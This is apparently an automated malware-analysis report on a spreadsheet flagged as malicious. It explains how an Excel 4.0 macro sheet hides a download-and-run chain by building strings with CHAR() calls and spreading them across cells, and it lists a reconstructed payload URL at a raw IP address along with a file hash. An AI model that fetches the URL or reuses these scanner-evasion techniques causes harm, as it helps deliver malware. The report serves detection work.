Verdict: MALICIOUS
Risk Score: 182
Heuristics: 4
- Excel 4.0 macro sheet (1 sheet(s)) | severity: critical | 2 related findings | rule: OOXML_XLM_MACROSHEET
  Spreadsheet contains an Excel 4.0 (XLM) macro sheet. XLM was a major Office malware vector during 2020-2022 and evaded many VBA-focused controls before Microsoft tightened XLM defaults. Even legitimate XLM use is rare in modern workbooks. The macro sheet is stored as XLSB/BIFF12 binary content, which many XML-only OOXML scanners miss.
- XLM payload reassembled from CHAR()/split formulas | severity: critical | rule: OOXML_XLM_REASSEMBLED_PAYLOAD
  An Excel 4.0 macro sheet builds its payload inside the formula token stream by concatenating per-character CHAR() calls and string fragments, so no WinAPI name, shell command, or URL is ever contiguous in the .bin for a literal-bytes scan to find. Reassembling the formulas recovered download/execute API names, LOLBin commands (regsvr32/rundll32/mshta/wmic/powershell), or a payload URL: the de-obfuscated download-and-run kill chain.
- URL reconstructed from XLM cell array (1 URL) | severity: critical | rule: OOXML_XLM_CELL_ARRAY_URL
  Excel 4.0 macro sheet stages its payload URL across individual numeric cells (one ASCII charcode per cell), inside an embedded HTA that uses VBScript Chr()/&-concat obfuscation, or split across multi-char fragment cells that a download formula concatenates by reference (=A1&A2&… / CONCATENATE(...)). The reconstructed URL is invisible to literal-bytes URL extraction because it is never contiguous in the workbook stream. URLs were recovered by walking the BIFF12 record stream of every worksheet and macrosheet part and decoding RK/inline-string/shared-string cells in row-major and column-major order, plus FORMULA cell-reference concatenation in token order.
- Embedded URL | severity: info | rule: EMBEDDED_URL
  One or more URLs were extracted from the document. The URL itself is not a detection; see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
  URL: http://159.89.9.74/campo/t/t (referenced by macro)
Extracted artifacts: 1
Files carved from inside the sample during analysis.

| Filename | Kind | Source | Size | SHA-256 |
|---|---|---|---|---|
| xlm_sheet_00.bin | xlm-macrosheet | OOXML XLM macro sheet: xl/macrosheets/sheet1.bin | 2606 bytes | e6ec2500101d372ffa78e9161d3230d8c3e1a08923f02ab560fb280522ca4c95 |
Script preview: first 1,000 lines of the extracted script (raw BIFF12 binary content).